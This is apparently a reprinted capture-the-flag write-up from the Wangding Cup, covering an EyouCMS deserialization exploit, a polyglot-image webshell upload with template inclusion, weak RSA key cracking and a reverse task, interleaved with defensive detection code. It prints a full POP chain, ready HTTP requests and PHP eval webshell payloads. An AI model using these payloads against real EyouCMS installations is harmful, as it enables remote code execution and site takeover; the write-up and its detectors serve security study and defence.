Wangding Cup (网鼎杯) Xuanwu Group: Partial Write-Ups

admin · 2024-11-08 15:54:19

web01

Method 1: Deserialization

References:

Google: https://n1k0la-t.github.io/2023/01/28/EyouCMS%20v1.6.1%200day%E6%8C%96%E6%8E%98/

FreeBUF: https://www.freebuf.com/vuls/405365.html

Opening the site shows it is EyouCMS, version 1.6.5; search Git hosting for the source code.
Visit the backend at login.php.
Log in with admin/admin.


Searching the web for EyouCMS vulnerabilities turns up CVE-2024-3431, but no PoC.


Construct the request based on that article.

Deserialization chain:

<?php
// POP chain as given in the write-up; the namespace separators lost in extraction
// are restored from the class names in the serialized payload of the edit request.
namespace think\cache\driver;
class File{
    public $tag='t';
    public $options = [
        'path'          => 'php://filter/string.rot13/resource=<?cuc @riny($_TRG[_]);?>/../a.php'
    ];
}

namespace think\session\driver;
use think\cache\driver\File;
class Memcached{
    public $handler;
    function __construct(){
        $this->handler=new File();
    }
}

namespace think\console;
use think\session\driver\Memcached;
class Output{
    public $styles = ['removeWhereField'];
    function __construct(){
        $this->handle=new Memcached();
    }
}

namespace think\model\relation;
use think\console\Output;
class HasOne{
    function __construct(){
        $this->query=new Output();
    }
}

namespace think\model;
use think\model\relation\HasOne;
class Pivot{
    public $append = ['getError'];
    public function __construct(){
        $this->error=new HasOne();
    }
}

namespace think\process\pipes;
use think\model\Pivot;
class Windows{
    public function __construct(){
        $this->files=[new Pivot()];
    }
}

$x=new Windows();
echo strlen(serialize($x));
echo base64_encode(serialize($x));

1. First add a column (栏目); the default id is 541, and if that does not work the id can be brute-forced.

POST /04cfe8025e76b4985ae4aee3b162b2d1/login.php?m=admin&c=Field&a=arctype_add&_ajax=1&lang=cn HTTP/1.1
Host: 192.168.1.3
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 94
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=6unq4gjml60ldlodv54t4i5m51; admin_lang=cn; home_lang=cn; ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A0%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; workspaceParam=welcome%7CIndex
Origin: http://192.168.1.3
Referer: http://192.168.1.3/login.php?m=admin&c=Arctype&a=ajax_newtpl&lang=cn&type=lists&nid=single
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest

title=web01test&name=web01test&dtype=region&dfvalue=1&remark=&typeids%5B%5D=0&channel_id=-99


2. Edit this column and write the serialized content into it.

POST /04cfe8025e76b4985ae4aee3b162b2d1/login.php?m=admin&c=Field&a=arctype_edit&_ajax=1&lang=cn HTTP/1.1
Host: 192.168.1.3
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 1001
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=6unq4gjml60ldlodv54t4i5m51; admin_lang=cn; home_lang=cn; ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A0%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; workspaceParam=welcome%7CIndex
Origin: http://192.168.1.3
Referer: http://192.168.1.3/login.php?m=admin&c=Arctype&a=ajax_newtpl&lang=cn&type=lists&nid=single
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest

title=web01test&name=web01test&old_dtype=region&dfvalue=O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A5%3A%22files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A2%3A%7Bs%3A6%3A%22append%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A8%3A%22getError%22%3B%7Ds%3A5%3A%22error%22%3BO%3A27%3A%22think%5Cmodel%5Crelation%5CHasOne%22%3A1%3A%7Bs%3A5%3A%22query%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A6%3A%22styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22removeWhereField%22%3B%7Ds%3A6%3A%22handle%22%3BO%3A30%3A%22think%5Csession%5Cdriver%5CMemcached%22%3A1%3A%7Bs%3A7%3A%22handler%22%3BO%3A23%3A%22think%5Ccache%5Cdriver%5CFile%22%3A2%3A%7Bs%3A3%3A%22tag%22%3Bs%3A1%3A%22t%22%3Bs%3A7%3A%22options%22%3Ba%3A1%3A%7Bs%3A4%3A%22path%22%3Bs%3A68%3A%22php%3A%2F%2Ffilter%2Fstring.rot13%2Fresource%3D%3C%3Fcuc+%40riny%28%24_TRG%5B_%5D%29%3B%3F%3E%2F..%2Fa.php%22%3B%7D%7D%7D%7D%7D%7D%7D%7D&old_dfvalue=1&remark=&typeids%5B%5D=0&channel_id=-99&id=548&old_name=web01test&dtype[]=region


Written successfully.


3. Visit the page to trigger the deserialization.


4. I could not reproduce this in my locally built environment; it is probably a PHP version or ThinkPHP issue. In the competition environment it worked directly.
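As an added defensive example (not code from the write-up or from EyouCMS), the following Python inspects a URL-encoded form body of the shape sent in step 2 and flags any value that carries a serialized PHP object header or a PHP stream wrapper, which is the check a WAF rule or an application-level input filter can apply before such a value is stored and later unserialized. Both sample bodies are constructed; the class name think\process\pipes\Windows is the one from the write-up's payload, and the object body is a harmless stand-in, not the chain above.

```python
import re
from urllib.parse import parse_qs, urlencode

# Constructed sample bodies. The first mirrors the shape of the write-up's
# arctype_edit request: a serialized ThinkPHP object smuggled in "dfvalue".
# The object body is a harmless stand-in, not the write-up's chain.
MALICIOUS_BODY = urlencode({
    "title": "web01test",
    "name": "web01test",
    "old_dtype": "region",
    "dfvalue": 'O:27:"think\\process\\pipes\\Windows":1:'
               '{s:5:"files";s:27:"php://filter/resource=a.php";}',
    "old_dfvalue": "1",
    "id": "548",
    "dtype[]": "region",
})
BENIGN_BODY = urlencode({"title": "news", "name": "news", "dfvalue": "1"})

# PHP object header: O:<name length>:"<class name>"
SERIALIZED_OBJECT = re.compile(r'O:(\d+):"([^"]*)"')
# Stream wrappers that have no business inside an ordinary form field
STREAM_WRAPPER = re.compile(r'\b(php|phar|data|expect|glob|compress\.\w+)://',
                            re.IGNORECASE)


def find_serialized_objects(body: str) -> list:
    """Return (parameter, class name) for every PHP object header whose declared
    length matches the class name, i.e. one that unserialize() would accept."""
    hits = []
    for param, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            for m in SERIALIZED_OBJECT.finditer(value):
                declared, name = int(m.group(1)), m.group(2)
                if declared == len(name.encode("utf-8")):  # PHP counts bytes
                    hits.append((param, name))
    return hits


def find_stream_wrappers(body: str) -> list:
    """Return (parameter, scheme) for every PHP stream wrapper found in a form value."""
    hits = []
    for param, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            for m in STREAM_WRAPPER.finditer(value):
                hits.append((param, m.group(1).lower()))
    return hits


def assess_body(body: str) -> dict:
    """Summarise both checks; 'block' is True when either indicator is present."""
    objects = find_serialized_objects(body)
    wrappers = find_stream_wrappers(body)
    return {"serialized_objects": objects,
            "stream_wrappers": wrappers,
            "block": bool(objects or wrappers)}


if __name__ == "__main__":
    for label, body in (("malicious", MALICIOUS_BODY), ("benign", BENIGN_BODY)):
        print(label, assess_body(body))
```

The length check matters: a header whose declared length does not match the name would fail in unserialize() anyway, so the filter only reports payloads that would actually deserialize. Run on the constructed bodies it blocks the first (one object, one php:// wrapper, both in dfvalue) and passes the second.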


Method 2: File upload + file inclusion

1. Upload


POST /login.php?m=admin&c=Ueditor&a=imageUp&savepath=allimg&pictitle=banner&dir=images&is_water=1&lang=cn&unneed_syn= HTTP/1.1
Host: 192.168.10.35
Content-Length: 432
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjnlAMRs0RqFuCxyM
Origin: http://192.168.10.35
Referer: http://192.168.10.35/login.php?m=admin&c=Uploadimgnew&a=get_upload_list&info=eyJudW0iOjEsInNpemUiOjIwOTcxNTIsImlucHV0IjoiIiwiZnVuYyI6IndlY2hhdF9waWNfY2FsbF9iYWNrIiwicGF0aCI6ImFsbGltZyIsImlzX3dhdGVyIjoxfQ%3D%3D&lang=cn&unneed_syn=
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: espcms_web_user_info=Ka46smL5rcg9exEplxVYBVPRwmhEQA6WeYFCIvIMSsqPsuPuTTNb3W1%2FjaBzTU8ez8gp%2B8pggV96%2FZZtDyCp2uJtQy8NyMSIat%2BvE15CWXvwKG3n5VqW2skWCXQ6epGhfQsVExJeu5afV6hcPyVcTp335WzaCu4L6q3YSjw9sR8ss3Vrctetiruty%2FS2UUD9NzKAaXwbsQ7Sndg3zsSi1RfTrIS7Txat%2B6jfxE%2FR36YAGMyepHPgXUX3CjAw4h7mBNtve5A2ZgpXZvG%2BJIBZVsfK2%2FQeVbCv7NCTHnRKapvzrqpvJk%2F8GWLVJUy%2F%2F74T5zcsZ5k05IjJy%2BszM77h4TOAg6rWLOaIZphyxq8I%2B88iwSHEFYRkWXB%2B9iXLDCVuATDNEcS0iMCecO9yhvRLpQEGrZuwV5fuHlhqg3IUjSV6DdNsBmWlxFfs%2BKWUAugin%2BrJ3AegVzg3jRgqIQwuXg5LwcfuUaPtPpqYdvMfJSJkrn2qTXqE0A9H7xv47mPWqcc9QBuJdiaSVt3ijy%2FcS0Hodi7p6gQ4AIYvxVYczR%2B%2FSrTxflt5EPng0QICB8keDjUPoLZ0bBT2YXXNzafYm%2Bn7b1NT2mtsdqNbDwffTjAKprS8iU1jKiyHtkg0PtGkE2HopemShQWMUjyjjlFoUsy5THdslhBwJNEwYYuQpPc2dH1VQYVPvezGze%2FEw%2B6frJ7ieHN6k2izdIJBK5lFsdAnJySSQgDlciYU632iSBxlUhOeErpPgxdh9ON7HctN%2FHWc7bXuKLtukHXubGDz0qiyo8sZ%2Fd7kPa%2FhOwCmI4MtIpnewKEEIzLn5wyMGFdj; espcms_web_server_info=cnlbzvT9pkB%2F%2Fa3QXzislq9%2B4%2BgVEB33q9hnv74tDZXmh5ZVm50VInsr%2BTFqqZIwS9KGlhqQlhlmBozbvdy7rRXUEE72xLLajnYi0wLIYmA%3D; PHPSESSID=e7jp10jq6tvdrspdg2uhfmaugh; admin_lang=cn; home_lang=cn; admin-treeClicked-Arr=%5B%5D; admin-arctreeClicked-Arr=%5B%5D; ENV_IS_UPHTML=0; ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A0%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; ENV_GOBACK_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; ENV_LIST_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; imgname_id_upload=erweima.png; workspaceParam=web%7CSystem; img_id_upload=
Connection: keep-alive

------WebKitFormBoundaryjnlAMRs0RqFuCxyM
Content-Disposition: form-data; name="_ajax"

1
------WebKitFormBoundaryjnlAMRs0RqFuCxyM
Content-Disposition: form-data; name="file"; filename="erweima.gif"
Content-Type: image/png

GIF89a<?php @eval($_POST['hack']);phpinfo();system("dir");?>
------WebKitFormBoundaryjnlAMRs0RqFuCxyM
Content-Disposition: form-data; name="type_id"

0
------WebKitFormBoundaryjnlAMRs0RqFuCxyM--


2. File inclusion

In the feature map, find the template function and include the uploaded file in index.html.


{eyou:include file="uploads/allimg/20241107/1-24110G513534M.gif" /}
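As an added example (not code from the write-up or from EyouCMS), this Python shows the two server-side checks that would catch the upload and the include independently: the uploaded "image" is flagged when its filename extension, declared Content-Type and sniffed magic bytes disagree (the write-up sends a .gif with Content-Type: image/png) or when the bytes contain a PHP open tag, and template text is scanned for {eyou:include} directives whose target lies in the user-writable uploads tree. The sample file bytes and the second template line are constructed; the uploads path is the one from the write-up and the PHP body is a harmless placeholder.

```python
import re

# Magic bytes of the image formats a banner/avatar upload should accept
IMAGE_MAGIC = {
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
}
CONTENT_TYPES = {"image/gif": "gif", "image/png": "png", "image/jpeg": "jpeg"}
EXTENSIONS = {"gif": "gif", "png": "png", "jpg": "jpeg", "jpeg": "jpeg"}
# <?php, <?= and the bare short tag followed by whitespace
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=|\s)", re.IGNORECASE)
# EyouCMS template include directive, in the form used in the write-up
EYOU_INCLUDE = re.compile(r'\{eyou:include\s+file="([^"]+)"\s*/?\}')


def sniff_image(data: bytes):
    """Return the image format implied by the leading magic bytes, or None."""
    for magic, fmt in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return fmt
    return None


def scan_upload(filename: str, content_type: str, data: bytes) -> set:
    """Return a set of finding codes; an empty set means the upload looks like a plain image."""
    findings = set()
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    ext_fmt = EXTENSIONS.get(ext)
    if ext_fmt is None:
        findings.add("extension-not-allowed")
    sniffed = sniff_image(data)
    if sniffed is None:
        findings.add("no-image-magic")
    if ext_fmt and sniffed and ext_fmt != sniffed:
        findings.add("extension-content-mismatch")
    if CONTENT_TYPES.get(content_type) != sniffed:
        findings.add("content-type-mismatch")
    if PHP_OPEN_TAG.search(data):  # a GIF header does not make embedded PHP harmless
        findings.add("php-open-tag")
    return findings


def find_upload_includes(template: str) -> list:
    """Return include targets that resolve into the user-writable uploads tree."""
    return [path for path in EYOU_INCLUDE.findall(template)
            if path.lstrip("/").startswith("uploads/")]


# Constructed sample: GIF header followed by a PHP tag, named .gif but declared image/png,
# the shape of the write-up's upload (the PHP body is a harmless placeholder)
POLYGLOT_UPLOAD = ("erweima.gif", "image/png", b"GIF89a<?php echo 'x'; ?>")
CLEAN_UPLOAD = ("banner.gif", "image/gif", b"GIF89a" + bytes(16))

# Constructed template: the write-up's include line plus an ordinary one
TEMPLATE = (
    '{eyou:include file="uploads/allimg/20241107/1-24110G513534M.gif" /}\n'
    '{eyou:include file="public/header.htm" /}\n'
)

if __name__ == "__main__":
    print(scan_upload(*POLYGLOT_UPLOAD))
    print(scan_upload(*CLEAN_UPLOAD))
    print(find_upload_includes(TEMPLATE))
```

The magic-byte check alone passes the polyglot, which is exactly why the write-up prefixes the payload with GIF89a; the content scan and the MIME/extension agreement are what reject it. The template scan is the complementary control: even if a polyglot lands in uploads/, an include directive pointing there is what turns it into executed code.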


web03

Solution steps (WriteUp)

Step 1: The environment is as shown.


Step 2: A Yujian (御剑) directory scan finds robots.txt.


Step 3: Download wbStego4.bmp.

Use the wbStego4 tool to extract the hidden file.


Step 4: Convert it to public key format.

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAHqSISYfkwuFeX20KTtyDhpG/nmyMK5MrmjKILUbLxpEtgw+4i0sIR4sWtNpGSVAMLZ4YO8EY6p7FBw0z4u0ALo2qC8I763lfKlNXH1WHWexRHd72MEpxpOzt79ukabEr7OWpRdDEISj3MyEalVNYGTKMt/TQWR/dnFd+TsDB2aRDBQQq9VfQhZ9Z864huQ4Du8PKg42plzfRPJsEhe4JpE0GW5QRap9ZNHM/4fSSHJlwqbBqGdeIjw+U7zY/RokxK979+f7SN6qMc9FzAUTnbwFGLpZe4ohz4pPJNrmRKfERTSKDoXw1krdDZuEZzCgiprpR8WqLvGoDXhYstcrgWU=

Step 5: Crack the public key with the 西二风 CTF tool.

Step 6: Export the private key and connect over SSH.


Building a local SSH public-key login environment

FROM ubuntu:20.04

# Install the SSH server
RUN apt-get update && \
    apt-get install -y openssh-server && \
    mkdir /var/run/sshd && \
    mkdir /root/.ssh

# Set the root password (optional)
RUN echo 'root456:*111!!' | chpasswd

# Allow root to log in over SSH
RUN sed -i 's/#PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config

# Add the public key
RUN echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAHqSISYfkwuFeX20KTtyDhpG/nmyMK5MrmjKILUbLxpEtgw+4i0sIR4sWtNpGSVAMLZ4YO8EY6p7FBw0z4u0ALo2qC8I763lfKlNXH1WHWexRHd72MEpxpOzt79ukabEr7OWpRdDEISj3MyEalVNYGTKMt/TQWR/dnFd+TsDB2aRDBQQq9VfQhZ9Z864huQ4Du8PKg42plzfRPJsEhe4JpE0GW5QRap9ZNHM/4fSSHJlwqbBqGdeIjw+U7zY/RokxK979+f7SN6qMc9FzAUTnbwFGLpZe4ohz4pPJNrmRKfERTSKDoXw1krdDZuEZzCgiprpR8WqLvGoDXhYstcrgWU=" > /root/.ssh/authorized_keys

# Set the correct permissions
RUN chmod 700 /root/.ssh && \
    chmod 600 /root/.ssh/authorized_keys

# Expose the SSH port
EXPOSE 22

# Start the SSH service
CMD ["/usr/sbin/sshd", "-D"]
docker build -t ssh-server .
docker run -d -p 2222:22 --name ssh-container ssh-server
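As an added example (not code from the write-up or from any of the tools it names), the following Python parses the public key that the Dockerfile above places in authorized_keys, using only the standard library, and applies the basic audit checks an operator would run on keys before trusting them: modulus size, parity and public exponent. The key string is the one from the page; the parsing follows the RFC 4253 layout of an ssh-rsa blob (three length-prefixed fields: the type string, e, n).

```python
import base64
import struct

# The public key recovered in step 4 of the write-up (copied from the page);
# it is also what the Dockerfile writes into /root/.ssh/authorized_keys.
PAGE_KEY = (
    "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAHqSISYfkwuFeX20KTtyDhpG/nmyMK5MrmjKILUbLxpEtgw"
    "+4i0sIR4sWtNpGSVAMLZ4YO8EY6p7FBw0z4u0ALo2qC8I763lfKlNXH1WHWexRHd72MEpxpOzt79ukabEr7"
    "OWpRdDEISj3MyEalVNYGTKMt/TQWR/dnFd+TsDB2aRDBQQq9VfQhZ9Z864huQ4Du8PKg42plzfRPJsEhe4"
    "JpE0GW5QRap9ZNHM/4fSSHJlwqbBqGdeIjw+U7zY/RokxK979+f7SN6qMc9FzAUTnbwFGLpZe4ohz4pPJN"
    "rmRKfERTSKDoXw1krdDZuEZzCgiprpR8WqLvGoDXhYstcrgWU="
)


def _read_strings(blob: bytes) -> list:
    """Split an RFC 4253 key blob into its uint32-length-prefixed fields."""
    fields, off = [], 0
    while off < len(blob):
        (n,) = struct.unpack(">I", blob[off:off + 4])
        off += 4
        fields.append(blob[off:off + n])
        off += n
    if off != len(blob):
        raise ValueError("truncated key blob")
    return fields


def parse_ssh_rsa(line: str) -> dict:
    """Parse one public-key / authorized_keys line and return its RSA parameters."""
    parts = line.split()
    key_type, blob = parts[0], base64.b64decode(parts[1])
    fields = _read_strings(blob)
    if key_type != "ssh-rsa" or len(fields) != 3 or fields[0] != b"ssh-rsa":
        raise ValueError("not an ssh-rsa key")
    e = int.from_bytes(fields[1], "big")  # mpint, big-endian
    n = int.from_bytes(fields[2], "big")
    return {"type": key_type, "e": e, "n": n, "bits": n.bit_length()}


def audit_rsa_key(info: dict, min_bits: int = 2048) -> list:
    """Return human-readable findings; an empty list means the key passes these checks."""
    findings = []
    if info["bits"] < min_bits:
        findings.append(f"modulus is {info['bits']} bits, below the {min_bits}-bit minimum")
    if info["n"] % 2 == 0:
        findings.append("modulus is even, so it is not a product of two odd primes")
    if info["e"] < 65537 or info["e"] % 2 == 0:
        findings.append(f"public exponent {info['e']} is unusually small or even")
    return findings


if __name__ == "__main__":
    info = parse_ssh_rsa(PAGE_KEY)
    print(f"{info['type']}: e={info['e']}, modulus={info['bits']} bits")
    for finding in audit_rsa_key(info):
        print("finding:", finding)
```

Run against the write-up's key this reports e = 65537 and a 2047-bit modulus (the leading modulus byte is 0x7a, so the top bit is clear), which already fails a 2048-bit minimum. These checks say nothing about the particular weakness the CTF tool exploited in step 5, which the write-up does not name; they are the cheap, always-applicable part of a key audit.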

Reverse2

Solution steps (WriteUp)

1. Decompile and read the class file directly; search it for wdflag.

2. Dump memory.


Originally published on the WeChat official account 瓜神学习网络安全: Wangding Cup (网鼎杯) Xuanwu Group: Partial Write-Ups

Reprinted by CN-SEC中文网 (please keep this link when reprinting; thanks to the original author): http://cn-sec.com/archives/3369211.html
